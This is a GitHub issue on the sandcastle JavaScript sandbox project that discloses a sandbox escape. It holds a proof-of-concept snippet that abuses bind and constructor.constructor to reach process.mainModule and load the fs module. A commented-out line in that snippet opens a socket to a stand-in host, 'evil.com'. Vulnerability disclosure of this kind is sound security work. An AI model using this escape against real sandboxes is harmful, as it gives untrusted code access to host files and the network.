bcoe / sandcastle

A simple and powerful sandbox for running untrusted JavaScript.
MIT License
222 stars 48 forks

Code can get access to sandbox.js's scope #70

Open io4 opened 8 years ago

io4 commented 8 years ago

Code can use `bind` to make `exit` or `runTask` (this one won't exit) run its own function; doing that, it will get access to the parameters that this function has: the error (useless), connection (a `net.Socket`) and its constructor, the `net` module, which might be used for bad/unwanted things like using server internal services.

Edit: I found you can even escape to the sandbox.js context, with access to almost everything (http://stackoverflow.com/questions/20899863/the-module-property-is-undefined-when-using-vm-runinthiscontext), but that can be overridden by getting to `require` from `process.mainModule`: `(new a.constructor.constructor("return global"))().process.mainModule.constructor._load("fs")`

Proof of Concept:

The idea is to replace `_this` and `_this._sendError` with what you want; inside it you could either modify the current socket or create a new one:

```javascript
var _this={};
_this._sendError=function(a,b){
    // a is the host-side connection object handed to _sendError
    // (new a.constructor).connect({host:"evil.com",port:8001});
   (new a.constructor.constructor("return this"))().process.mainModule.constructor._load("fs");
};
var o={};
o.o=o; // circular reference
runTask.bind(_this)("msg",o); // Intended error in JSON.stringify
```

moonheart08 commented 8 years ago

The bug can be countered by setting runTask.bind and exit.bind to undefined. (Credit to io4) Edit: can be gotten past using constructors